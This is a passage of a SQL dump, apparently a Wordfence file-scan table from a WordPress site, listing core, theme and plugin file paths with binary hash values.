Y;U���&��4=�5KQ�ia�','',0,'?'),('=S�6�a��Xo�,�2','wp-content/plugins/wordfence/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�V8�\\���Bs','7�h�����>8b�ut^^�Rx�26�#i(�','',0,'?'),('=f�u�A><Th���@','wp-includes/js/jquery/ui/progressbar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�sk�����Z�j Y','���7���v��\r6��1��N9@v�7�$�a��','',0,'?'),('=�v�M)\n��ո��','wp-content/themes/skt-toothy/images/footer-icon-email.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�K.t@)��M�G�\Z�','�p<6\"��T���h�e�dDH�&�,%��0','',0,'?'),('=��k�[4��� ��=�','wp-includes/comment-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��|?�M��=]J��','�4x��������!Gk˙���Lto�!��\'�#','',0,'?'),('=��Ө��\0E���','wp-includes/blocks/verse/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h�h>��K3���u1','��ߋ�!�;n�^�u|ا�$Y0�56��4�','',0,'?'),('=�;�{���e�6�5�','wp-includes/js/jquery/ui/effect-pulsate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*\r�I�͕;t��W��','�����BD8�=~�b���wJ=�� ǐ�E��','',0,'?'),('=�y\ZH��\r�� �G�','wp-content/themes/vision-lite/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H��QAX�n�0�','��{���Q���Á��\Z���&Uע0=`���','',0,'?'),('=�F�혣�Æ��K&�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9�:7���]6hVo��','߫��/Lk����OT�bdS�EiL9���~8','',0,'?'),('=噄\nA�K(���l','wp-includes/js/dist/keyboard-shortcuts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@J��x&H�*8�����.','2�j��!^g^i�r3�P~�\0�K8�c��\n�','',0,'?'),('=�a������0&','wp-includes/js/jquery/ui/effect-slide.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a�d��{2װ�','T�f��b������>�s;X<`0��<9��:�','',0,'?'),('>5��ˏ.y2Q[ڣ�1�','wp-includes/blocks/block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i8��X�3����cTD','�J���$_�F�$o�����{�fC�~L�3��<','',0,'?'),('>G��O�jP�l���B','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�����\'Ρ0�g2','ؚx\"�o�*I�\nQ��j�����T(�G\Z�.�\Z','',0,'?'),('>L\'�\0.�b�pC���','wp-content/themes/skt-toothy/images/slides/slider1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]\"vM��i���','-�^��k���y�5�x@�Ga�h��9��+�$�','',0,'?'),('>Y�����/�n~�[Hַ','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�^�ޏ���@�c','�PF�\0��~.�0�szm�A>��-u�f��','',0,'?'),('>d�RLډDh�uJH���','wp-content/plugins/wp-cerber/assets/bn5ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڑ����@�/�@�','\0�o �~�}�2�,_*Í {J�O�4SfY��','',0,'?'),('>hЩ�XX*�v1���','wp-includes/theme-compat/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ϫ�-�Y�D��s��','���A8}���G(oܵ����SQ��:z��b','',0,'?'),('>ql�+�m�\05Ħ\"�^','wp-includes/js/customize-preview.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tQ��M�ʈ�����','��=��y�0��RAB�b����)�?=�n�','',0,'?'),('>v]�{rq�6x�','wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y��JkԌ`�M\"�r',';Ը�P��I��@?56�t���k�N�8@�=�4','',0,'?'),('>���45��JZJ$^p','wp-content/themes/regina-lite/layout/js/plugins/skip-link-focus-fix/skip-link-focus-fix.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���iV�X�\'��x���','(�<*��w@���C���4�&�q�','',0,'?'),('>��X�\r�b��ڟ�$W','wp-includes/class-wp-image-editor-gd.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�RŖ���z`�T��','� U� 5�BOu��>F���p_��}�d�.��','',0,'?'),('>�\nq��g�/����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�X�y����gr\"3g','a�55�\Z�\\���7w{Լ^d�����TK�','',0,'?'),('>ؔ���~p�?���$xK','wp-content/themes/regina-lite/layout/images/team/team-member-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�w�6l�t5��u�','�t��_8��dܝ��i{n�[]8�l \\6�{ċ','',0,'?'),('>�M~��;Oo��-�I$0','wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f!��<�\r����yS�','\"-d���NN6�3�P`��ʜ`!��ڬ �q�','',0,'?'),('?�ke�zC��\"!�@�','wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89�\"��zz��Vv*��]','�ۆ%%l�:J�f<�bq��P���Pt˯}ߝ\"�f','',0,'?'),('?WqC��v;�l���','wp-content/themes/vision-lite/customize-pro/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GW�\n����o(%�VR6','����8�1�8�¢_pc@��0ܽ&͠W����','',0,'?'),('?2yT!s|��t��u}','wp-includes/random_compat/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�����\ZHr�','\nDfdvP�f�On:����a��г���X�','',0,'?'),('??Q$�P���.:X6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0@�I�SB','�1����đ���,�h�-��h�>fھ�G]','',0,'?'),('?U������\'_l.�p','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o>B�� ����IN�-y','��hl�[�������(�l~�Q�u�FM� �','',0,'?'),('?Yv�q_����ۮXO','wp-content/plugins/wordfence/images/sort_both.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�B�Qx�SV.D','����6��\"@X�g\'�W7��w��gJ���q','',0,'?'),('?Z>Z��E��S�ƨIJ','wp-content/themes/weblog/acmethemes/customizer/header-options/header-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�V�%�MKqt�e','�~3(m�˪�\'埍��(�`HR��Ǚˍ�KQ','',0,'?'),('?]�P�.��1����2b','wp-includes/js/tinymce/plugins/textcolor/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%i�3����f����','(��EL����b[��K�!s�ӊ�nIJ��','',0,'?'),('?���Z���8.���G','wp-content/plugins/wp-cerber/assets/flags/ec.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�* �k&�(ʬjJ�','Bd=�Zj?r/{��\Z���7MF��\'��n-Zi��','',0,'?'),('?�W%�N��UK;��$','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/icon-picker.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�;#��N�tp��\0#','��HJ�[Wjt�\Zl~�J�rs�`S�$.JRkm','',0,'?'),('?��=�@�M�$#��P7','wp-includes/js/dist/html-entities.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�l��m7��#��F','�z�d��q�ٻ�ٿ��� l���w�5�M�','',0,'?'),('?���C����!��Ӳ','wp-content/themes/twentynineteen/sass/modules/_accessibility.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��*+��O}��g�','�/����h�f=@�0��5��H�0\r7t��m�8','',0,'?'),('?�A���=���4]>�','wp-content/themes/advance/inc/kirki/assets/js/functions/validate-css-value.js',0,'��Y<�ǣ�)����>','��Y<�ǣ�)����>','�}� E��gv<�3HI.Qaq�������zU','',0,'?'),('?�cF m��wI_��','wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*=i���ɱ����HR','����sk���Tˎč��u�|��Ќ���','',0,'?'),('@!�a�ie�\\1}ݱ�z','wp-content/themes/twentytwenty/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3s{_ƕ]��p�','���o;~]�b�^�R�<�l$�ә��1�6','',0,'?'),('@)�u��X�tȤ�0�','wp-content/plugins/wp-cerber/assets/flags/ng.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�mBC@�͚���','���H�!R�Ɂ=[�?aq�μYو�_hw��','',0,'?'),('@G )�7x=��A��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/audio/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"����i�qo��h ?�','ڴaWtĉ����q�)N��*x�*���q;T��0','',0,'?'),('@L<��m�^��c��Ic','wp-content/plugins/wp-cerber/assets/flags/bb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0��(�zc�q','7!Ky�=�]b\neO-3{/Q��ȳ�Rҳ��L','',0,'?'),('@V�$�K���<�1*�','wp-includes/css/jquery-ui-dialog.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S`���7у�-�','j�&�Ұ�M������u�@��6L}�5����{','',0,'?'),('@^��%����ͥw�}','wp-content/themes/advance/inc/kirki/includes/class-kirki-fonts.php',0,'[�D�~����4�:','[�D�~����4�:','Z�y�P�X7�wg6Rz��4�^�l���O','',0,'?'),('@b`+ki�n�WLBFG','wp-content/themes/regina-lite/inc/customizer/assets/images/fullwidth.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x��hT�u4�!�8�\"�','�����\"���RL}�4�ny��\0���f��','',0,'?'),('@k/�����I�?T,','wp-includes/js/jquery/ui/datepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4}�aX2nH��GWx�{','/4XAJ\Z����o>V��ꔆ�I����','',0,'?'),('@o\\��P�����t�','wp-content/themes/healthcare/images/responsive-photo-pro.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DT�����sP};\r��','�q=x-\\ug���\"�o�� YHԈE�KD#ӱ','',0,'?'),('@��̘9�#�L�y(��','wp-includes/images/arrow-pointer-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��b�·*L���[��','����fb�ZD1.���V��aw�4l?��p�G^�{','',0,'?'),('@��L���:���(���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/psalm-autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��\0�6�&� �','uj���v��d_���=\n�2fY+��V\\��','',0,'?'),('@��\Z!z��r���W��p','wp-content/plugins/wordfence/views/waf/option-rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.Գ� <`�ϒ&�','V5��;����S6��,�Uft��Yn`A','',0,'?'),('@�XD\n�\nRN��t���','wp-admin/images/menu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�9#�d�Y` ���','�l��IE/(�p��\0�pn�T-O�z\"],=`�','',0,'?'),('@�ȯ��&O�o���','wp-content/plugins/wordfence/lib/noc1.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9e�b\0��PO�����','_�u���j������P��-KOA�ܫ�����','',0,'?'),('@�L��߯7�٭kقE','wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R١��.�1&;�@','Y>]��B�A���u��5u�6�jT�6��d\rr+','',0,'?'),('@�;5�X��V��O�Z','wp-admin/images/mask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g~�\"��J��䩎�','��/<s�ԡ�)�\'�.�1��jkn�K9Q���','',0,'?'),('@�m����O��W','wp-admin/admin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E�����Lv��','v�����tQ�+4&f�d�1��Z�6LI�=�','',0,'?'),('@�t�R>G�Hh��ס','wp-admin/css/revisions-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�=���a�-�II','7G�V����ԉͦE<����x�Z)��:�%','',0,'?'),('@�s�Z��^����q�v','wp-admin/images/media-button-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�WI��\\��?��','�<�:��tn�kb�wi�&�� ��R����\Z','',0,'?'),('@��+�T΄\'����٤','wp-includes/ID3/module.audio.flac.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-�ל�/f��T�@','�_d�s�`C�Ro\Z-��Y/�X{��Bƛ�,O�','',0,'?'),('A\n��M��?��0s7�','wp-content/themes/healing-touch/css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�\r� �Q�+ʇ��.�','�.�@T��`�,U��\rDJz����\\�47�_\n�/','',0,'?'),('A�lA~i^����u�Ø','wp-admin/css/customize-nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(RroΡC\r�\n�F�+�','��ﴖ�ș*���t�Q��zWÆ�ײU','',0,'?'),('AE���[�`����','wp-includes/js/thickbox/thickbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|}�\Zc�%��9j��','��b?/a#��h�l��������\rk���','',0,'?'),('A/hͳ$BQ��:����','wp-content/themes/twentynineteen/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HP~�,Y��`sMu�k�0','��;�`� ��:�6�P��q�L�:*;��','',0,'?'),('A;�ت\Z���ܦ�z�','wp-includes/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�#��l�>m','��ٹmc(�l��\'�mt�ˣ�[��g��W','',0,'?'),('AH�X���ה�!�\r��','wp-content/themes/vision-lite/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�E:9U��O���\'�','��h�&�L���q��~��s�*��l�A;�r','',0,'?'),('AK<���j���gsr�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��Kb(�\\��p�B-','�ճ* ʰ ���[q��˜P���k�','',0,'?'),('AT�yxhl|�4+��n�','wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4 vHhg�BL','됤oϙ�,/����ɞq�?����s��CvF�','',0,'?'),('AỶ�k��{�v�r','wp-content/plugins/redirection/api/api-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=_��!��-���\03S�','�?5鿡/(ÀU�u��Ph�_�Ou8V$��','',0,'?'),('Aa�@J������Ł�','wp-includes/js/tinymce/plugins/colorpicker/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' C��ȭ?d�{V��','���B��R�\0�!�䄚����Q�����\'5w','',0,'?'),('Aa��Z4�J�/��^��','wp-content/themes/doctors/core/contents/part_header/skin1/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[���T\n%�&ˎ','��S��:��Hi�=^�o���m�։!s�S�w','',0,'?'),('As�v���g�4U�','wp-includes/js/dist/nux.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G�r�[Ķ��i��k�','����=cA\"�-3�8��{t-�8 ��h�','',0,'?'),('A{&� ��V>��Νs','wp-admin/css/login-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N -?�6�>��9�A͘','!�;#Q%BX\"GҵWM��>���a���T��37D','',0,'?'),('A~�=�J�H!C�[^l�','wp-content/themes/weblog/assets/library/respond/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�\n��&���r','#%6�Y;C���\Z�����ER�ijO�F?�}�<','',0,'?'),('A����I7Y������','wp-content/plugins/redirection/locale/redirection-sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�h�8z\\����c�','\'\' M���ڒq�O��1O=���R�¦�','',0,'?'),('A�/���$�\'ov�r�%','wp-content/themes/regina-lite/layout/js/plugins/customizer/customizer.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����j�����o','���]Mu9�\07��Kke���p��/o(��F~�f','',0,'?'),('Aػ#���\"���j�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�\\�ס\0�Ӹ���\Z�','؉(U�G�g�L��춗ږ\'GmD����','',0,'?'),('A�\\ݛ���-��7\Z�1','wp-content/plugins/wp-cerber/assets/flags/kh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\0B/\ro��5��;�','m~�~�����B���)��~����D?��ID','',0,'?'),('A�CC�\Z^O��^Bz�','wp-content/themes/advance/inc/kirki/assets/js/controls/multicolor.js',0,'�D�=��Ln���6','�D�=��Ln���6','V��uЍ�#�:��Q�2���L ��ű\Za','',0,'?'),('A���$h��՝`Q�a','wp-content/plugins/akismet/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�� P�Z�ݢ`Ef','��}���5�e�3��3��mhyD�Q(','',0,'?'),('B^��t�p�k���!�','wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�*L�TG��4%P���','-������n�F�J�&T�P�o\\ϓ\\����2���','',0,'?'),('B$�[\nfIZ&��[','wp-content/plugins/wp-cerber/assets/flags/na.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� B�z�z��Q�\"�','���5�������o�]�-� �)�Qb~��\0�','',0,'?'),('BJ��O������z�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�1�MR�KE_�/','|q�UUѿÎ|z��G>*�ۜ\"���I����;�','',0,'?'),('BUj�v\\ѣ����(�','wp-content/plugins/wordfence/views/common/license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:8�����^�r','�f�B�-h������^�>A���nH0�\r&��','',0,'?'),('B_�-�Th�+`ä�R','wp-content/themes/twentynineteen/sass/variables-site/_colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��N�x\\�\r�v/�','tG����ք��2�\ZF�]aY����Jb��p��','',0,'?'),('B��j�)��q�D�S','wp-admin/install-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�Aoq�+C2Xd��','�W>�;��%֏6s�%T���v��#o(ʓ�','',0,'?'),('B�G�&.�Tlg�jPPj','wp-content/themes/doctors/core/home/blocks/testimonial/skin1/c-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']{����vo�>�Xp','�E��! m{�j��zVL\'��Vϑ�X3/\n���','',0,'?'),('B����Q���aU�%','wp-content/plugins/wordfence/views/scanner/issue-knownfile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G^=�p�=$��\Z�2','�RK�6�����N\"3*\"�J�/0i�x0�','',0,'?'),('B��h�0��\"@6�`','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-custom.php',0,'w4z�:/X��(�X�','w4z�:/X��(�X�','��aⓦhU�H �\r#j�⽋0!�;YD�k�','',0,'?'),('B�}/i9L4$��aw1��','wp-content/themes/wp-barrister/content-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�Ƹ7�\'뙛0���','���*�Ń�AIs�����]��7�\n���','',0,'?'),('Bϵ���H@x���/','wp-content/plugins/wordfence/waf/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vc+p*�\"G��?�B','�MO(��� G\rkHԽ�eq�� �Lj�F�o�O�-','',0,'?'),('B�P�X�W��6��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �QA�L���U�','���G��\n<.\ZW�r���ʪ��Ø�)','',0,'?'),('B�yzN����k$L��','wp-content/themes/healing-touch/images/social/fb-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��#G�<[<���;�','�%c��}6�JQ�sm�@��� ����\Z��Ui�:','',0,'?'),('B���&��\Z��','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-radio-image.php',0,'Lذ�A/1�(����','Lذ�A/1�(����','��E΅Th3� g���]-yX�|/�Rc|��=�','',0,'?'),('C�ѹep<A��Cf','wp-content/themes/advance/inc/kirki/includes/lib/class-kirki-color.php',0,'&q<���x�����vb�','&q<���x�����vb�','��e|�TtĀk21�7��d�mr����Oꥆ�','',0,'?'),('C4��Ȝ��-�f�!-�','wp-content/themes/twentytwenty/assets/images/2020-landscape-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n=⎼��t�NR�','�@m�o��ܛMbrђ����$ �z�\r�2�K=','',0,'?'),('CL5EX��)���4�','wp-content/themes/healing-touch/css/main.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q?�$5�\n7�C>x�','@RS�l�i>�K,?��K(c�4�L��&�xЩ�','',0,'?'),('Cc�iF��h�.n7�','wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �����)<�Q2�İ��','Pp�y�C���W7i~��g��`�����','',0,'?'),('C���I���S7�<','wp-content/plugins/wordfence/modules/login-security/views/page/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ш>\\g��ǡ�$��c�','��ii��G�C����N�FL�)7%�ʙ�','',0,'?'),('C��/�@�l��Y��2}','wp-includes/css/dist/format-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k(O�1m<�0v��vV','���1�q�XX|ί}Cw�}�o�]5F\n�~��','',0,'?'),('C�ؚ�T�R�!vF{','wp-includes/customize/class-wp-customize-nav-menu-item-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*:Uț�J>��h�z','=��C����\0\"ȗ�gp�{��K�ϮD�\'�','',0,'?'),('C�\Z%���$j�pg','wp-content/themes/regina-lite/inc/customizer/custom-controls/class-regina-text-custom-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�s�3��u�h�����','��� A���S�d�KdN�̧N7�\n���<','',0,'?'),('C��s\\�\n���s��\'m','wp-content/plugins/wordfence/lib/menu_tools_whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bR��\'~��f�_D�','\Z�G�X\'~S�_AF��)t�iw�k�PELX6','',0,'?'),('Dm�\n��z�H��S���','wp-includes/images/crystal/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'^c�s���D��3T\\','g�t�( Ŏ�k`5͒��J��M5���:j�','',0,'?'),('D.��:�\0��S�R8','wp-includes/ID3/module.audio-video.asf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�Oo�x�&]��\\L','͆%F ��/\r���:�����0;>�_M3��w�','',0,'?'),('D6m�e�r{pK�O�','wp-includes/locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ʋ\04�)o�ybU^�','�<�6n�\'�J�����_�� �S%��GVJ','',0,'?'),('D=n�vbP��._��','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��UWn:s�zk]U`��','@�%H2Z6#���y�����U4I�-��','',0,'?'),('DU���uZ�F���Z','wp-content/plugins/wp-cerber/assets/flags/no.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4� \Z���rM�','',0,'?'),('D`��q&2��','wp-content/themes/twentytwentyone/assets/sass/06-components/single.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]H�9\0�$a�','c����f�����}�u���h���&����','',0,'?'),('Dm��u�ϣ�!�I�5H�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pٽ��P��]G���','�|�� )��Y�M��,3���0���\Z*�9�p','',0,'?'),('Dx�ȳ)&47ܦң','wp-content/plugins/redirection/fileio/nginx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����cx<Rʗ�y�','~Օ�>U��5�c4�x����0�Vg�ZlU�w','',0,'?'),('D���u�\r��ɲ\Z','wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4Z?d����⢡','1XaRpLrIO%�%|\r��Vge\0�-b�^�n�=�','',0,'?'),('D����)ba�k��{��','wp-admin/includes/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�\np�Z�,���v�','k�_DRH{���\0�#�6Z�~�}����u��V�','',0,'?'),('D�C����E[=���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filescan-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z#/@�(C�`Њ�X��','�/k�#�R_���ElK�ʀ`J�T�*]X��|','',0,'?'),('DԘٓ@�b\Zl�yu','wp-content/themes/regina-lite/layout/js/custom.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'H%��\"w�5�<�i\r!','���\\6��>qP���6�u��]3�fy�9-X|�','',0,'?'),('Dչ�����$Oa����','wp-admin/css/colors/ectoplasm/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�S�S�_�Y�_3�f','ib��������itYz�Q.��F0��O^','',0,'?'),('D�E.Gྠb9k�8L=','wp-content/plugins/wp-cerber/assets/flags/hk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i.�@������C�_','�52Kx襹���*��Ȫ��b�B;b��*��\"�','',0,'?'),('D�Ӈ��q�ԝY����`','wp-content/themes/doctors/core/includes/dynamic-custom.css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�#�����H̊�','�G:\'vs�Y���y�>G��s �\"A6���֭','',0,'?'),('D�T[�-��U���','wp-content/plugins/wordfence/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','($h�c���1�h��','=zQ�o��5�?\0�d�_�\r���V5�M�j�N�?�','',0,'?'),('D��5\n\'�\\��~W��','wp-includes/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`��k�3wh��k�͔','G�>�F|59��~�q|\n&\0��R l�','',0,'?'),('D�%X��\0T\\7���I�','wp-content/plugins/wordfence/modules/login-security/css/admin.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�%v#)��ݩ5��!�','B��i�x�����u\n�1ͺ2��{�','',0,'?'),('E�t�Iy���N,�','wp-content/themes/wp-barrister/library/images/icon-email.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�L������V\":;#','�ɒ;��i�-��ی�bF�xZ7��}|����','',0,'?'),('E#���-v37�6�Ť','wp-content/plugins/wordfence/wordfence.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F(e����韲7\Z.�','c�eEjˉ�\n��#;{��gul��r�p','',0,'?'),('E4��fu\r#R:k!jgh','wp-includes/js/wp-list-revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�\Z�ۦ_��8K',']\r��o�8�Y�6��)ryW?�Y�����b�z(','',0,'?'),('E5�;����tR���$L�','wp-includes/js/dist/element.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 